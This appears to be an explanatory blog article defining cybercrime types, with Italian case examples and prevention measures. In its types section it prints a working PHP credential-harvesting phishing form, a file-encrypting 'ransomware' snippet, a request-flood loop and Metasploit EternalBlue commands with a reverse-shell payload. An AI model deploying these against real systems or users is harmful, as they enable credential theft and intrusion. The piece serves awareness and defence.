Tech Deep Dive

Cybercrime: threats, types and examples

Find out what cybercrime is, the most common types, real-world examples and how

Types of cybercrime

1 September 2025

Table of contents

  • Cybercrime what is it? Meaning and technical definition
  • Cybercrime: What are the most common types and real-world examples to know
  • How to prevent cybercrime: solutions and strategies
  • The defense is multi-level
  • Personal and business safety checklist

Cybercrime is one of the most pervasive threats of our time . With the increase in dependence on information technology, cybercrime has also evolved, affecting individuals, businesses, hospitals and governments.

This article explores what cybercrime is, the most common types of cybercrime , with recent concrete examples , and how to implement solid cybercrime prevention at a personal and corporate level.

Cybercrime what is it? Meaning and technical definition

Cybercrime: the meaning. Cybercrime is any illicit activity that involves a computer system, a network or a device connected to the Internet as a means, target or environment of the crime.

The technical definition classifies it as “a computer crime committed by means of electronic devices, with the aim of damaging, extorting, manipulating or stealing data or digital resources”.

Cybercrime is distinguished from ordinary crimes by its digital and transnational nature.

Criminals don’t need to be physically present to carry out an attack: they can operate from anywhere in the world, targeting critical infrastructure, unwitting users, or even misconfigured artificial intelligence.

1. Crimes against the person

These cybercrimes aim to directly harm individuals by acting on their identity, reputation or psychological integrity.

Online identity theft

This cybercrime is often based on phishing, which can be done via email, SMS (smishing) or phone calls (vishing). A classic example of a PHP script to simulate a fake phishing login (to be used only for educational purposes or red teaming simulations):

<?php

// FAKE LOGIN FORM - FOR INDOOR TESTING ONLY

if ($_SERVER['REQUEST_METHOD'] === 'POST') {

$file = fopen("credentials.txt", "a+");

fwrite($file, "Email: " . $_POST['email'] . " | Password: " . $_POST['password'] . "\n");

fclose($file);

header("Location: https://example.com/login?error"); // redirect post phishing

exit();

}

?>

<form method="post">

Email: <input type="text" name="email">

Password: <input type="password" name="password">

<input type="submit" value="Sign in">

</form>

Real example (Italy, 2022)
 A phishing attack targeting INPS users led to the theft of SPID credentials to access bonuses and sensitive documents.

Sextortion

Technique where the victim receives threatening emails claiming to have intimate images recorded via malware or access to the webcam. Payment is requested in Bitcoin.

Real example
Subject: We hacked your computer (Evidence: password123)
Your screen was recorded while you were viewing adult content.
Pay 500€ in BTC to this address…

Defense: Webcam coverage, up-to-date antivirus, process monitoring (e.g. lsof -i on Linux to see if the webcam is in use).

Cyberstalking

It is implemented through continuous surveillance of the online presence, threatening messages, doxing and tracking of movements via GPS (in case of stalking via installed apps).

Tools used by criminals:

  • Stalkerware (e.g. mSpy, FlexiSPY)
  • Unauthorized access to social profiles

2. Data crimes

These attacks aim to violate sensitive data, whether personal or corporate. They often cause serious reputational damage and economic losses.

Ransomware

Ransomware encrypts data and demands a ransom. It usually exploits Word or PDF attachments with macros or RCE vulnerabilities.

Basic Python code example (educational only):

from cryptography.fernet import Fernet

# Symmetric key to encrypt data

key = Fernet.generate_key()

cipher = Fernet(key)

# Encrypt a file

with open('sensitive_documents.txt', 'rb') as f:

data = f.read()

enc_data = cipher.encrypt(data)

with open('sensitive_documents.txt', 'wb') as f:

f.write(enc_data)

Real-world example
 In 2023, the LockBit group attacked the Italian Revenue Agency, demanding millions of euros and threatening to publish millions of tax documents.

Data breach

Massive database breach. Often results from misconfigurations of MongoDB , Elasticsearch , or unauthenticated S3 buckets.

Real example
The Italian platform HoMobile suffered a massive theft of SIM cards and customer personal data (name, number, ICCID) in 2021.

Example command to scan for open MongoDB ports:

nmap -p 27017 --script mongodb-info <target>

Spyware

Software that collects data such as browser history, cookies, log files, saved credentials. It can be installed from an attachment or via an exploit kit.

  • Detection techniques
    Monitoring background processes (ps aux), using EDR tools and checking for suspicious log files.

3. Crimes against systems

They aim to compromise the integrity, availability and functioning of IT systems: from web servers to the OT supply chain.

DDoS Attacks

Distributed Denial of Service attack involves sending a huge volume of requests to a server, saturating its resources.

Basic Python code (local testing):

import requests

for i in range(10000):

try:

requests.get('http://127.0.0.1:8000')

except:

pass

Professional tools: LOIC, HOIC, Slowloris

Real example
In 2022, the Italian Ministry of Defense website was made unreachable for 48 hours by DDoS attacks claimed by the pro-Russian group KillNet.

System intrusions

Unauthorized access to a computer system by exploiting known vulnerabilities (CVEs) or weak passwords.

Exploit example (simulated):

msfconsole

use exploit/windows/smb/ms17_010_eternalblue

set RHOST <target IP>

set PAYLOAD windows/x64/meterpreter/reverse_tcp

exploit

Defense: Software updates, segmentation, strong passwords, MFA.

Defacement

Illegal modification of an organization’s web pages with political messages, insults, or symbols.

Real example
In 2020, the website of an Italian public school was defaced with an ISIS flag and threatening phrases. The server had WordPress with a plugin that had not been updated for 3 years.

Command to identify vulnerable CMS:

whatweb --log-verbose=log.txt http://targetsite.com

Cybercrime: What are the most common types and real-world examples to know

Real-life examples of Cybercrime.

Case 1: Ransomware attack on an Italian hospital (2024)

A group of cybercriminals compromised the IT systems of an Italian public hospital, encrypting medical records and blocking bookings. A ransom of 1 million euros in Bitcoin was demanded. Health services were paralyzed for days, with serious consequences for cancer patients.

Case 2: Large-scale phishing via certified email

In 2023, thousands of Italian companies were reached by fake PECs from the Revenue Agency. The messages contained infected attachments that, if opened, installed malware to steal confidential information and company data.

Case 3: Computer fraud with social engineering

In 2022, a multinational company was defrauded with a well-designed cyber fraud: a fake CEO ordered the transfer of 2 million euros to a foreign account via email, using social engineering and address spoofing techniques.

How to prevent cybercrime: solutions and strategies

Cybercrime prevention can no longer be left to chance or improvisation. In a context where cybercrimes are increasing in complexity and frequency, it is essential to implement multilevel strategies that combine technological tools, training and policies.

Here is a comprehensive overview of solutions to prevent cybercrime, accompanied by practical examples.

1. Two or more factor authentication (2FA/MFA)

One of the most effective ways to protect sensitive data and accounts is to implement 2FA (Two-Factor Authentication) or MFA (Multi-Factor Authentication).

Practical example
Google Authenticator, Microsoft Authenticator, Duo Security or OTP via SMS/email are tools that force the user to confirm their identity even if the password is compromised.

Example of 2FA implementation in Laravel PHP:

use PragmaRX\Google2FALaravel\Support\Authenticator;

public function login(Request $request)

{

$user = User::where('email', $request->email)->first();

if ($user && Hash::check($request->password, $user->password)) {

$authenticator = app(Authenticator::class)->boot($request);

if ($authenticator->isAuthenticated()) {

Auth::login($user);

return redirect()->intended('dashboard');

}

}

return redirect()->back()->withErrors(['Authentication failed']);

}

2. Updated security software

A system without updates is the perfect target for a cyber attack. Cybercriminals exploit known vulnerabilities (CVE) to gain access to systems.

Best practices:

  • Automatic Patch Management (e.g. WSUS, APT, yum)
  • Antivirus and EDR (Endpoint Detection & Response) such as BitDefender, CrowdStrike, SentinelOne
  • Software and hardware firewalls (pfSense, Cisco, Fortinet)

Useful command on Linux:

sudo apt update && sudo apt upgrade -y

3. Regular and secure backups

A backup is not useful if it is:

  • on the same compromised system
  • not tested
  • unencrypted

Effective backup strategies:

  • 3-2-1 model: 3 copies, 2 on different media, 1 off-site
  • Automatic daily backups to isolated NAS
  • Encryption with GPG or AES256

Example bash script:

#!/bin/bash

tar czf /mnt/backup/backup-$(date +%F).tar.gz /var/www/html

gpg -c /mnt/backup/backup-$(date +%F).tar.gz

rm /mnt/backup/backup-$(date +%F).tar.gz

4. Segmentation and access control

A successful attack does not have to compromise the entire system. Network segmentation and the principle of least privilege are essential.

Control examples:

  • Separating IT and OT networks in industrial environments
  • Use dedicated VLANs and subnets
  • Restrict access to files and folders via ACL

Example with iptables:

iptables -A INPUT -p tcp -s 192.168.1.0/24 --dport 22 -j ACCEPT

iptables -A INPUT -p tcp --dport 22 -j DROP

5. SIEM systems and threat detection

SIEM (Security Information and Event Management) collect logs from various sources to identify anomalies and intrusion attempts.

Open source and commercial solutions:

  • Wazuh, Graylog, ELK Stack
  • Splunk, IBM QRadar, Microsoft Sentinel

Example query with Elasticsearch to detect failed login attempts:

{

"query": {

"bool": {

"must": [

{ "match": { "event.type": "authentication_failure" } },

{ "range": { "@timestamp": { "gte": "now-1h" } } }

]

}

}

}

6. Training and safety culture

Even the best technology is useless if the user clicks on a malicious link. Every organization must educate its employees to recognize cyber threats.

Recommended techniques:

  • Phishing simulations (e.g. with GoPhish)
  • Short monthly training sessions
  • Internal newsletters with updates on cyber fraud

7. Corporate policies and security governance

Every company must have a written and shared cyber security policy. The standards to follow include:

  • ISO/IEC 27001
  • NIST Cyber Security Framework
  • GDPR for the protection of personal data

Example of minimum policy to adopt:

  • All company devices must have complex passwords
  • It is forbidden to use unencrypted USBs
  • Backups performed every 24 hours and stored for 30 days
  • Software updates within 48 hours of patch release

8. Continuous monitoring and threat intelligence

Being informed in real time about new cyber threats is crucial.

Recommended resources:

  • CERT-AgID (for the Italian public administration)
  • AlienVault OTX, VirusTotal, AbuseIPDB
  • Open source feeds like MISP or TheHive

9. Mobile Security and BYOD

In the Bring Your Own Device model, it is essential to protect smartphones and tablets:

  • Mobile Device Management (MDM) to control remote access
  • Set mandatory PIN and biometrics
  • Restrict the use of unauthorized apps

10. Hardening of systems and services

The operating system should be made more secure by eliminating unnecessary services, setting proper permission logic, and monitoring critical files.

Useful tools:

  • Lynis: Security Scanner for Linux
  • Auditd: Sensitive File Monitoring
  • Fail2ban: IP block after too many failed attempts

The defense is multi-level

cybercrime prevention requires a multi-layered approach that spans software, training, backup, and governance. A single tool is not enough to stop cybercrime : it is the integration of technologies, behaviors, and processes that makes the difference.

In the next paragraph we will provide you with a downloadable checklist to immediately apply these strategies, both in the company and at home. In the meantime, if you have any doubts or want to tell us how you protect your systems, leave a comment in the form below.

Personal and business safety checklist

Here is a checklist that can be adapted for both individuals and small and medium-sized businesses:

  • Update your operating systems and software regularly
  • Enable two-factor authentication on all your accounts
  • Use unique and complex passwords (use a password manager)
  • Install and configure a good antivirus and firewall
  • Never click on suspicious links or unexpected attachments
  • Encrypt files containing sensitive data
  • Perform automatic backups to offline media
  • Report any attempted scam to the relevant authorities
  • Educate your co-workers and family members about cyber threats
  • Regularly check your systems access logs

A downloadable template in PDF format is recommended for systematic and structured cybercrime prevention.

To conclude

Cybercrime is one of the main dangers in the digital world today. Whether it is an individual user or a large company, no one is immune.

However, knowing what cybercrime is , the types of cybercrime that exist and the most well-known real cases can help you adopt effective cyber security measures. Cybercrime prevention is not an optional choice, but a shared responsibility.

Questions and answers

  1. What is cybercrime?
    It is a computer crime that involves the illicit use of digital technologies for criminal purposes.
  2. What are the most common types of cybercrime?
    Identity theft, ransomware, phishing, DDoS attacks, online fraud.
  3. What is cybercrime?
    A crime committed by using computers, networks, or connected devices to steal data or cause harm.
  4. How do you recognize a cyber attack?
    Suspicious emails, system slowdowns, unauthorized access or file loss are common signs.
  5. What to do if you are a victim of cybercrime?
    Report it to the Postal Police, disconnect compromised devices, contact security experts.
  6. What is the difference between cybercrime and cyberwarfare?
    Cybercrime has economic purposes, while cyberwarfare is used by states for sabotage or espionage.
  7. Does backup protect against ransomware?
    Yes, if your backups are offline or in secure, encrypted clouds.
  8. What are the tools to prevent a cyber attack?
    Antivirus, firewall, two-factor authentication, updates and training.
  9. How can you protect a website from attacks?
    Using WAF, backups, constant updates and access control.
  10. Can AI help against cybercrime?
    Yes, through machine learning-based threat detection systems.
3
To top